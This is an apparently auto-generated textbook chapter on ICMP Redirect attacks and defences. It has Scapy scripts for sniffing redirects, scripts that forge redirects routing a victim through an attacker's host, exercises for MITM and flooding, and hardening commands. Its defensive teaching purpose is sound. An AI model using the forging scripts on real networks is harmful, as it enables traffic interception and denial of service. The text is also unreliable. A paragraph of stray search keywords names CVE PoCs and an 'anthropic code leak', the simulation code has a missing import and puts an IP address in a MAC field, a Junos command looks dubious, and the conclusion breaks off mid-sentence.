Supplemental 50: ICMP Redirect Analysis with Scapy

Author: Patrick Luan de Mattos
Category: network-l1
Level: Advanced
Generated: 2026-04-22T12:43:56.742Z

Supplemental Chapter: Serial 50 - ICMP Redirect Analysis with Scapy

Title: Unmasking ICMP Redirects: Routing Manipulation, Detection, and Mitigation with Scapy

Focus: ICMP redirect type/code, routing manipulation, detection and mitigation.

Level: Advanced

Introduction: The Subtle Art of ICMP Redirects

In the intricate world of network communication, the Internet Control Message Protocol (ICMP) plays a crucial role in conveying error messages and operational information about IP datagrams. While often perceived as a benign protocol, ICMP can be a powerful tool for network administrators to diagnose connectivity issues. However, its flexibility also opens the door to sophisticated network manipulation. One such mechanism is the ICMP Redirect message, a seemingly helpful feature designed to inform a host about a more optimal route to a destination.

This chapter delves deep into the ICMP Redirect message, exploring its fundamental mechanics, its potential for malicious routing manipulation, and how we can leverage the power of Scapy to detect, analyze, and ultimately mitigate such threats. We will uncover how attackers might exploit ICMP redirects to reroute traffic, conduct man-in-the-middle attacks, or even launch denial-of-service campaigns. Understanding these nuances is paramount for advanced network security professionals aiming to secure their infrastructure against evolving threats, including those that might resemble sophisticated zerosday exploits in their stealth and impact.

While the provided search console queries touch upon various topics, our focus remains squarely on the security implications and technical analysis of ICMP redirects. We will not be discussing specific CVEs like cve-2026-34040 poc, cve-2026-20963 github, or AI-related vulnerabilities like anthropic code leak directly, as they do not pertain to the core functionality of ICMP redirects. However, the principles of analyzing network protocols for malicious intent, which we will explore here, are universally applicable to understanding and defending against such threats.

1. Understanding ICMP Redirects: The Basics

ICMP Redirect messages are a type of ICMP control message defined in RFC 792. They are sent by a router to a host on the same network segment when the router determines that a better route exists for a particular destination. The primary purpose is to optimize routing tables on end hosts, reducing unnecessary traffic to intermediate routers.

1.1. ICMP Redirect Type and Code

The ICMP protocol uses a Type and Code system to differentiate various message categories. For ICMP Redirects:

• Type 5: Redirect Message
  • Code 0: Redirect for the network. This code indicates that the redirect is for a specific network.
  • Code 1: Redirect for the host. This code signifies that the redirect is for a specific host.
  • Code 2: Redirect for the Type of Service and network. This code is used when the redirect is based on a specific Type of Service (ToS) and network.
  • Code 3: Redirect for the Type of Service and host. This code is used when the redirect is based on a specific Type of Service (ToS) and host.

1.2. The Redirect Message Structure

A typical ICMP Redirect message consists of the following fields:

• Type (8 bits): Value 5.
• Code (8 bits): 0, 1, 2, or 3, as described above.
• Checksum (16 bits): Standard ICMP checksum for error detection.
• Unused (32 bits): Reserved for future use.
• Internet Address (32 bits): The IP address of the gateway that the sending host should use instead.
• Internet Header (variable length): The IP header and the first 8 bytes of the data of the original datagram that triggered the redirect. This is crucial for the receiving host to identify the specific traffic flow.

1.3. The Redirect Scenario

Consider the following network topology:

+----------+       +----------+       +----------+
|   Host A |-------| Router 1 |-------| Router 2 |
+----------+       +----------+       +----------+
     |                                     |
     |                                     |
     +-------------------------------------+
               (Direct Link)

Let's say Host A wants to send a packet to Host B, which is on a different network. Host A's default gateway is Router 1.

1. Host A sends a packet destined for Host B.
2. The packet arrives at Router 1.
3. Router 1, after consulting its routing table, realizes that the best path to Host B is not through itself, but through Router 2.
4. Router 1 forwards the packet to Router 2.
5. Crucially, Router 1 sends an ICMP Redirect message back to Host A. This message informs Host A that for traffic destined to Host B's network (or Host B itself), Router 2 is a better gateway.
6. Host A receives the ICMP Redirect and, if it's configured to accept redirects, updates its own routing table to send future traffic for Host B directly to Router 2 (or through Router 1 to Router 2, depending on the configuration).

1.4. Host Redirection Behavior

The behavior of hosts upon receiving ICMP Redirects is often configurable. Many operating systems, by default, accept and process these redirects to optimize network performance. However, this default behavior is precisely what makes them a target for malicious exploitation.

2. Routing Manipulation with ICMP Redirects: The Dark Side

The ability of ICMP Redirects to alter a host's routing table makes them a potent tool for attackers. By sending forged ICMP Redirect messages, an attacker can trick a victim host into sending its traffic through a compromised machine.

2.1. Man-in-the-Middle (MITM) Attacks

One of the most common attacks leveraging ICMP Redirects is the Man-in-the-Middle attack. An attacker can position themselves on the same network segment as the victim and the legitimate router.

Scenario:

+----------+       +----------+       +----------+
|   Host A |-------| Router 1 |-------| Router 2 |
+----------+       +----------+       +----------+
     |                                     |
     |                                     |
+----------+                               |
| Attacker |-------------------------------+
+----------+

Let's assume Host A wants to communicate with a server on the internet. Router 1 is Host A's default gateway.

1. Attacker's Position: The attacker is on the same subnet as Host A and Router 1.
2. ARP Spoofing (Optional but common): The attacker might first perform ARP spoofing to trick Host A into believing the attacker's MAC address is that of Router 1, and trick Router 1 into believing the attacker's MAC address is that of Host A. This ensures traffic between Host A and Router 1 is directed to the attacker.
3. Forged ICMP Redirects: When Host A sends a packet to an external destination, it goes to Router 1 (or the attacker, if ARP spoofing is in play). Router 1 forwards it to the next hop.
4. The attacker, intercepting this traffic, can then forge an ICMP Redirect message. This forged message will tell Host A that the attacker's IP address is the correct gateway for the destination network.
5. Host A receives the forged ICMP Redirect and updates its routing table. Now, all traffic destined for that network will be sent directly to the attacker.
6. The attacker can then:
   • Inspect traffic: Read sensitive information like usernames, passwords, or session cookies.
   • Modify traffic: Alter data in transit.
   • Drop traffic: Prevent communication, leading to a denial-of-service.
   • Forward traffic: Pass the traffic along to the legitimate destination to avoid immediate detection, but still maintain a MITM position.

2.2. Denial of Service (DoS) Attacks

ICMP Redirects can also be used to disrupt network connectivity. An attacker can flood a host with ICMP Redirects pointing to non-existent or unreachable gateways. This can overwhelm the host's network stack, leading to performance degradation or complete denial of service.

2.3. Bypassing Network Segmentation/Firewalls

In some scenarios, an attacker might use ICMP Redirects to force traffic through a less protected path. For instance, if a firewall blocks direct access to a sensitive server from Host A, but allows access from the attacker's machine, an ICMP Redirect could be used to reroute traffic to the attacker, who then forwards it to the server.

3. Detecting and Analyzing ICMP Redirects with Scapy

Scapy is a powerful interactive packet manipulation tool and library. It allows us to craft, send, sniff, and dissect network packets with incredible flexibility, making it an ideal tool for analyzing ICMP Redirects.

3.1. Capturing ICMP Redirects

We can use Scapy to capture ICMP Redirect messages in real-time.

#!/usr/bin/env python3

from scapy.all import sniff, ICMP, IP, Raw

def icmp_redirect_callback(packet):
    """
    Callback function to process captured ICMP Redirect packets.
    """
    if packet.haslayer(ICMP) and packet[ICMP].type == 5:
        print(f"[*] Received ICMP Redirect:")
        print(f"    Source IP: {packet[IP].src}")
        print(f"    Destination IP: {packet[IP].dst}")
        print(f"    Redirect Type: {packet[ICMP].type}")
        print(f"    Redirect Code: {packet[ICMP].code}")
        print(f"    Gateway IP: {packet[ICMP].gw}")
        print(f"    Original IP Header:")
        # Print the original IP header if present
        if packet.haslayer(Raw):
            original_ip_header = packet[Raw].load[:20] # First 20 bytes of original IP header
            try:
                original_ip = IP(original_ip_header)
                print(f"        Original Source: {original_ip.src}")
                print(f"        Original Destination: {original_ip.dst}")
                print(f"        Original Protocol: {original_ip.proto}")
            except Exception as e:
                print(f"        Could not parse original IP header: {e}")
        print("-" * 30)

def start_icmp_redirect_listener(interface):
    """
    Starts sniffing for ICMP Redirect packets on a specified interface.
    """
    print(f"[*] Starting ICMP Redirect listener on interface {interface}...")
    try:
        sniff(filter="icmp", prn=icmp_redirect_callback, store=0, iface=interface)
    except OSError as e:
        print(f"[!] Error: Could not start sniffing on interface {interface}. Ensure you have necessary permissions (e.g., run as root/administrator).")
        print(f"[!] Details: {e}")
    except KeyboardInterrupt:
        print("\n[*] ICMP Redirect listener stopped.")

if __name__ == "__main__":
    # Replace 'eth0' with your network interface name (e.g., 'wlan0', 'en0')
    # You can find your interface name using 'ip addr' or 'ifconfig' on Linux/macOS,
    # or 'ipconfig' on Windows.
    network_interface = "eth0" # Example interface, change this!
    start_icmp_redirect_listener(network_interface)

Explanation:

• sniff(filter="icmp", ...): This tells Scapy to capture only ICMP packets.
• prn=icmp_redirect_callback: This specifies the function to be called for each captured packet.
• store=0: This prevents Scapy from storing all captured packets in memory, which is good for long-running captures.
• iface=interface: Specifies the network interface to listen on.
• packet.haslayer(ICMP) and packet[ICMP].type == 5: This checks if the packet is an ICMP packet and if its type is 5 (Redirect).
• packet[ICMP].code: Displays the specific code for the redirect.
• packet[ICMP].gw: This field contains the IP address of the suggested new gateway.
• packet.haslayer(Raw) and parsing original_ip_header: ICMP Redirects include the original IP header. We attempt to parse this to understand which traffic flow the redirect pertains to.

3.2. Crafting and Sending ICMP Redirects

To understand how these messages can be abused, we can also craft and send them ourselves. Caution: Sending forged ICMP Redirects on a production network can have severe consequences and is highly illegal without explicit authorization. This section is for educational purposes only.

#!/usr/bin/env python3

from scapy.all import IP, ICMP, send

def craft_icmp_redirect(src_ip, dst_ip, original_ip_src, original_ip_dst, original_proto, new_gateway_ip, icmp_code=0):
    """
    Crafts an ICMP Redirect message.

    Args:
        src_ip (str): The IP address of the sender (e.g., a router).
        dst_ip (str): The IP address of the recipient of the redirect (the host).
        original_ip_src (str): Source IP of the original packet.
        original_ip_dst (str): Destination IP of the original packet.
        original_proto (int): Protocol of the original packet (e.g., 6 for TCP, 17 for UDP).
        new_gateway_ip (str): The IP address of the recommended gateway.
        icmp_code (int): The ICMP Redirect code (0 for network, 1 for host).

    Returns:
        scapy.packet.Packet: The crafted ICMP Redirect packet.
    """
    # Create the original IP header that triggered the redirect
    original_ip_header = IP(src=original_ip_src, dst=original_ip_dst, proto=original_proto)
    # For simplicity, we're not including the full original data, just the header.
    # In a real attack, you might want to include more of the original packet.

    # Craft the ICMP Redirect message
    icmp_redirect = ICMP(type=5, code=icmp_code, gw=new_gateway_ip)

    # Combine IP layer and ICMP layer
    packet = IP(src=src_ip, dst=dst_ip) / icmp_redirect / original_ip_header

    return packet

if __name__ == "__main__":
    # Example usage:
    # Imagine Host A (192.168.1.100) sent a packet to 8.8.8.8.
    # Our "router" (192.168.1.1) wants to tell Host A to use 192.168.1.2 as the gateway for this destination.

    # Attacker/Router perspective sending the redirect:
    redirect_sender_ip = "192.168.1.1"  # IP of the device sending the redirect (could be a compromised router or attacker)
    target_host_ip = "192.168.1.100"   # The host that received the original packet and will get the redirect

    # Details of the original packet that triggered the redirect:
    original_packet_src = "192.168.1.100" # Host A
    original_packet_dst = "8.8.8.8"       # External DNS server
    original_packet_proto = 6             # TCP (example)

    # The IP address of the gateway that Host A should use instead
    recommended_gateway_ip = "192.168.1.2" # The attacker's IP or another router

    # Craft the ICMP Redirect message (e.g., redirect for host)
    redirect_packet = craft_icmp_redirect(
        src_ip=redirect_sender_ip,
        dst_ip=target_host_ip,
        original_ip_src=original_packet_src,
        original_ip_dst=original_packet_dst,
        original_proto=original_packet_proto,
        new_gateway_ip=recommended_gateway_ip,
        icmp_code=1 # Redirect for host
    )

    print("[*] Crafting ICMP Redirect packet...")
    redirect_packet.show()

    # To send this packet, you would use:
    # print("[*] Sending ICMP Redirect packet...")
    # send(redirect_packet, verbose=0)
    # print("[*] Packet sent.")
    # WARNING: Do not run the send command on a live network without authorization.

Explanation:

• IP(src=..., dst=...): Defines the IP layer of the ICMP Redirect message itself. The src is the IP of the device sending the redirect, and dst is the IP of the host that will receive the redirect.
• ICMP(type=5, code=..., gw=...): Constructs the ICMP layer. gw is the critical field, specifying the IP address of the new gateway.
• original_ip_header: This is a crucial part of the ICMP Redirect. It includes the IP header of the original packet that prompted the redirect. This allows the receiving host to match the redirect to the specific traffic flow.
• /: The Scapy operator used to layer packets.
• send(): The Scapy function to transmit packets.

4. Security Analysis and Mitigation

Understanding how ICMP Redirects work is the first step. The next is to analyze their security implications and implement effective mitigation strategies.

4.1. Vulnerabilities Exploited

• Trust in ICMP: Systems that blindly trust ICMP Redirect messages are vulnerable.
• Network Proximity: Attackers need to be on the same network segment as the victim host or have a compromised router to effectively inject forged redirects.
• Lack of Authentication: ICMP itself does not provide any authentication mechanisms, making it easy to forge messages.

4.2. Detection Strategies

• Network Monitoring: Continuously monitor network traffic for unusual ICMP Redirect messages. Look for:
  • Redirects originating from unexpected sources.
  • A high volume of redirects for the same destination.
  • Redirects pointing to IP addresses that are not legitimate routers.
  • Redirects that contradict existing routing tables.
• Log Analysis: Analyze router and host logs for ICMP Redirect events. Correlate these events with suspicious network activity.
• Honeypots: Deploy honeypots configured to detect and alert on ICMP Redirect attempts.

4.3. Mitigation Techniques

• Disable ICMP Redirects on Hosts: This is the most effective way to prevent hosts from being tricked by forged redirects.
  • Linux:

    # Disable for IPv4
    sudo sysctl -w net.ipv4.conf.all.accept_redirects=0
    sudo sysctl -w net.ipv4.conf.default.accept_redirects=0
    
    # Disable for IPv6 (if applicable)
    sudo sysctl -w net.ipv6.conf.all.accept_redirects=0
    sudo sysctl -w net.ipv6.conf.default.accept_redirects=0
    
    # To make changes persistent, edit /etc/sysctl.conf
    # Add these lines:
    # net.ipv4.conf.all.accept_redirects = 0
    # net.ipv4.conf.default.accept_redirects = 0
    # net.ipv6.conf.all.accept_redirects = 0
    # net.ipv6.conf.default.accept_redirects = 0

  • Windows:

    # Disable for IPv4
    reg add HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v EnableICMPRedirect /t REG_DWORD /d 0 /f
    
    # Restart the machine or relevant network services for changes to take effect.
    # For persistent changes, this registry key is usually the way.

• Configure Routers to Not Send Redirects: While less common and potentially impacting legitimate routing optimization, routers can be configured to suppress ICMP Redirects. This is often a global setting or per-interface.
  • Cisco IOS:

    no ip redirects

    or on a specific interface:

    interface GigabitEthernet0/1
     no ip redirects

  • Juniper Junos:

    set system ip-learning no-redirects

    (Note: This is a simplified example; Junos configuration can be more nuanced.)
• Implement Router Advertisements (RAs) for IPv6: For IPv6, Router Advertisements (RAs) are the standard mechanism for hosts to learn about routers and prefixes. Hosts should be configured to rely on RAs and ignore ICMPv6 Redirects (which have a similar function but are handled differently).
• Ingress Filtering: Implement ingress filtering on routers to drop packets with source IP addresses that do not belong to the subnet from which they are received. This can prevent spoofed packets from originating within the network.
• Static Routing: For critical servers or segments, consider using static routing instead of relying on dynamic routing protocols or host-based redirects. This removes the possibility of dynamic route manipulation via ICMP.
• Network Segmentation: Segmenting the network into smaller, isolated broadcast domains can limit the scope of an attacker's ability to inject forged ICMP Redirects.

5. Troubleshooting ICMP Redirect Issues

When encountering network connectivity problems or unexpected routing behavior, ICMP Redirects might be involved.

5.1. Symptoms of Malicious Redirects:

• Sudden inability to reach specific external services.
• Slow network performance for certain destinations.
• Traffic being unexpectedly routed through a specific internal IP address.
• Security alerts indicating MITM activity.
• Users reporting that their traffic is being intercepted or altered.

5.2. Troubleshooting Steps:

1. Verify Host Configuration: Check if accept_redirects is enabled on the affected host(s). If it is, temporarily disable it and see if the issue resolves.
2. Capture Traffic: Use Scapy or Wireshark on the affected host to capture incoming traffic. Look for ICMP Type 5 packets. Analyze their source, destination, and the gw field.
3. Analyze Router Logs: Examine logs on your edge routers and internal routers for any unusual ICMP Redirect messages being sent or received.
4. Check Routing Tables:
   • On the affected host: Use route -n (Linux) or route print (Windows) to inspect the host's routing table. See if there are any unexpected entries pointing to non-standard gateways.
   • On routers: Verify the routing tables of your routers to ensure they are consistent and not being manipulated.
5. Identify the Source: If you capture forged redirects, try to pinpoint the source IP address. If it's an internal IP, investigate that machine. If it's an external IP, it might indicate a compromised upstream router or a sophisticated external attack.
6. Isolate the Host/Segment: If a malicious redirect is confirmed, isolate the affected host or network segment to prevent further compromise.
7. Review Firewall Rules: Ensure firewall rules are not inadvertently allowing forged ICMP Redirects or traffic that bypasses security controls due to redirect manipulation.

6. Advanced Scapy Techniques for ICMP Redirect Analysis

Beyond basic sniffing and crafting, Scapy offers advanced capabilities for more in-depth analysis.

6.1. Simulating a Compromised Router

You can use Scapy to simulate a router that is sending malicious redirects. This is invaluable for testing your detection mechanisms.

#!/usr/bin/env python3

from scapy.all import IP, ICMP, send, Ether
import time

def simulate_malicious_redirect(router_ip, attacker_ip, victim_ip, target_network_prefix, interface):
    """
    Simulates a router sending a forged ICMP Redirect to redirect traffic
    for a specific network prefix to the attacker's IP.

    Args:
        router_ip (str): The IP of the legitimate router.
        attacker_ip (str): The IP of the attacker's machine (the new gateway).
        victim_ip (str): The IP of the victim host.
        target_network_prefix (str): The network prefix to redirect (e.g., "10.0.0.0/8").
        interface (str): The network interface to send the packet from.
    """
    print(f"[*] Simulating ICMP Redirect for network {target_network_prefix} to {attacker_ip}...")

    # We need the MAC address of the victim to send the Ether frame
    # In a real scenario, you'd use ARP to get this. For simulation, we assume we know it.
    # You can use scapy.all.getmacbyip(victim_ip) for this.
    try:
        victim_mac = getmacbyip(victim_ip)
        if not victim_mac:
            print(f"[!] Could not resolve MAC address for {victim_ip}. Cannot send Ether frame.")
            return
    except Exception as e:
        print(f"[!] Error resolving MAC for {victim_ip}: {e}. Cannot send Ether frame.")
        return

    # Parse the network prefix into IP and netmask for the IP layer
    target_network_ip = target_network_prefix.split('/')[0]
    target_prefix_len = int(target_network_prefix.split('/')[1])

    # Create the original IP header that *would have been* sent by the victim
    # This is what the redirect message will contain.
    # We are pretending the victim sent a packet to a host within target_network_prefix
    original_ip_header = IP(src=victim_ip, dst=target_network_ip) # Destination is within the target network

    # Craft the ICMP Redirect message
    # Type 5, Code 0 (Redirect for the network)
    icmp_redirect = ICMP(type=5, code=0, gw=attacker_ip)

    # Combine the IP layer of the redirect message and the ICMP layer
    # The IP layer's src is the router, dst is the victim
    redirect_packet_ip_icmp = IP(src=router_ip, dst=victim_ip) / icmp_redirect / original_ip_header

    # Wrap in an Ethernet frame to send on the local network
    ether_frame = Ether(src=router_ip, dst=victim_mac) / redirect_packet_ip_icmp

    print(f"[*] Sending forged ICMP Redirect on interface {interface}...")
    send(ether_frame, iface=interface, verbose=0)
    print("[*] Forged ICMP Redirect sent.")
    print("[*] Victim should now route traffic for {} via {}".format(target_network_prefix, attacker_ip))

if __name__ == "__main__":
    # --- Configuration ---
    # THIS IS FOR TESTING IN A CONTROLLED LAB ENVIRONMENT ONLY!
    # Running this on a production network is illegal and harmful.

    ROUTER_IP = "192.168.1.1"       # IP of the legitimate router (or what you're pretending to be)
    ATTACKER_IP = "192.168.1.10"    # IP of the attacker's machine (new gateway)
    VICTIM_IP = "192.168.1.100"     # IP of the victim machine
    TARGET_NETWORK = "172.16.0.0/16" # Example network to redirect traffic for
    NETWORK_INTERFACE = "eth0"      # Your network interface (e.g., 'eth0', 'en0')
    # ---------------------

    print("!!! WARNING: This script simulates malicious activity. !!!")
    print("!!! Use ONLY in a controlled lab environment. !!!")
    time.sleep(3)

    # You might need to run this with root/administrator privileges
    simulate_malicious_redirect(ROUTER_IP, ATTACKER_IP, VICTIM_IP, TARGET_NETWORK, NETWORK_INTERFACE)

6.2. Analyzing the Impact of Redirects

You can use Scapy to send traffic after a redirect has been sent and observe where it goes.

#!/usr/bin/env python3

from scapy.all import IP, TCP, send, sniff
import threading
import time

# Global flag to stop sniffing
stop_sniffing = threading.Event()

def packet_handler(packet):
    """Handles captured packets."""
    if packet.haslayer(IP):
        print(f"[*] Captured: {packet[IP].src} -> {packet[IP].dst} (Proto: {packet[IP].proto})")
    if stop_sniffing.is_set():
        return

def start_traffic_capture(interface):
    """Starts sniffing for packets."""
    print(f"[*] Starting traffic capture on {interface}...")
    try:
        sniff(filter="ip", prn=packet_handler, store=0, iface=interface, stop_filter=lambda x: stop_sniffing.is_set())
    except Exception as e:
        print(f"[!] Error during sniffing: {e}")
    print("[*] Traffic capture stopped.")

if __name__ == "__main__":
    # --- Configuration ---
    # This script assumes you have already sent a forged ICMP redirect
    # to make traffic for TARGET_IP go through ATTACKER_IP.

    ATTACKER_IP = "192.168.1.10"      # Your IP (the attacker's machine)
    TARGET_IP = "8.8.8.8"             # The IP you want to send traffic to
    NETWORK_INTERFACE = "eth0"        # Your network interface
    # ---------------------

    print("!!! This script simulates observing traffic after a redirect. !!!")
    print("!!! Ensure a redirect has already been sent to manipulate routing. !!!")
    time.sleep(3)

    # Start sniffing in a separate thread
    sniffer_thread = threading.Thread(target=start_traffic_capture, args=(NETWORK_INTERFACE,))
    sniffer_thread.daemon = True # Allow main thread to exit even if sniffer is running
    sniffer_thread.start()

    # Give the sniffer a moment to start
    time.sleep(2)

    print(f"[*] Sending traffic from {ATTACKER_IP} to {TARGET_IP}...")
    # Craft a simple TCP SYN packet
    test_packet = IP(src=ATTACKER_IP, dst=TARGET_IP) / TCP(dport=80, flags="S")

    try:
        send(test_packet, iface=NETWORK_INTERFACE, verbose=0)
        print("[*] Test packet sent.")
    except Exception as e:
        print(f"[!] Error sending packet: {e}")

    # Let the sniffer run for a few seconds to capture the response (if any)
    print("[*] Waiting for potential response packets...")
    time.sleep(10)

    # Signal the sniffer to stop
    stop_sniffing.set()
    sniffer_thread.join() # Wait for the sniffer thread to finish

    print("[*] Analysis complete.")

7. Exercises

Here are some exercises to solidify your understanding of ICMP Redirects and Scapy:

1. Basic Capture and Analysis:

   • Set up a simple lab environment with two hosts and one router (or simulate this using VMs).
   • Configure one host to use the router as its default gateway.
   • Use Scapy to sniff ICMP packets on the host.
   • Generate traffic from the host to a destination that requires routing through the router.
   • Observe if any ICMP Redirects are generated by the router and analyze their type, code, and gateway IP.

2. Crafting Host Redirects:

   • Using Scapy, craft an ICMP Redirect message (Type 5, Code 1) that tells a hypothetical host to use a specific IP address as the gateway for a particular destination host.
   • Show the crafted packet using packet.show().

3. Crafting Network Redirects:

   • Similar to Exercise 2, but craft an ICMP Redirect message (Type 5, Code 0) for a network prefix.
   • Analyze the difference in the code field and the implications for the receiving host.

4. Simulating a MITM Attack (Lab Only):

   • In your controlled lab environment, set up three machines: Victim, Attacker, and Router.
   • Configure the Victim to use the Router as its default gateway.
   • On the Attacker machine, use Scapy to send forged ICMP Redirects to the Victim, instructing it to use the Attacker's IP as the gateway for all traffic destined for the internet.
   • Simultaneously, configure the Attacker to forward legitimate traffic to the Router.
   • Observe the traffic flow from the Victim's perspective.

5. Detecting Redirects with Scapy:

   • Write a Scapy script that listens for ICMP Redirect messages (Type 5) on a specific interface.
   • When a redirect is detected, print the source IP of the redirect, the target IP of the original packet, and the IP of the suggested new gateway.

6. Disabling Redirects and Testing:

   • On a Linux machine, disable ICMP redirects (net.ipv4.conf.all.accept_redirects = 0).
   • Attempt to send forged ICMP Redirects to this machine from another machine in your lab.
   • Verify that the host does not update its routing table based on the forged redirects.

7. Analyzing Original IP Header:

   • Modify the icmp_redirect_callback function from Section 3.1 to more thoroughly parse and display information from the original IP header included in the ICMP Redirect, such as original source, destination, and protocol.

8. IPv6 ICMPv6 Redirects (Advanced):

   • Research ICMPv6 Redirect messages (Type 137).
   • Attempt to capture and analyze ICMPv6 Redirects in an IPv6 lab environment using Scapy.
   • Understand the differences in structure and function compared to IPv4 ICMP Redirects.

9. Scripting a Redirect Flood (Lab Only):

   • Write a Scapy script that sends a high volume of forged ICMP Redirects to a target host, pointing to various non-existent or loopback addresses.
   • Observe the impact on the target host's network performance. Use extreme caution and only in a isolated lab.

10. Integrating with a SIEM (Conceptual):

    • Imagine you have a Security Information and Event Management (SIEM) system. How would you configure your network monitoring tools and Scapy scripts to send alerts to the SIEM when suspicious ICMP Redirect activity is detected? Consider the data points you would extract.

Conclusion

ICMP Redirect messages, while intended to optimize network routing, present a significant security risk when exploited. Their ability to manipulate host routing tables makes them a powerful tool for attackers aiming to conduct Man-in-the-Middle attacks, denial-of-service, and other malicious activities.

By understanding the mechanics of ICMP Redirects, their types and codes, and by leveraging

This chapter is part of the "From Zero to Network Doctor" open textbook series. All examples are educational and use safe, lab-only environments.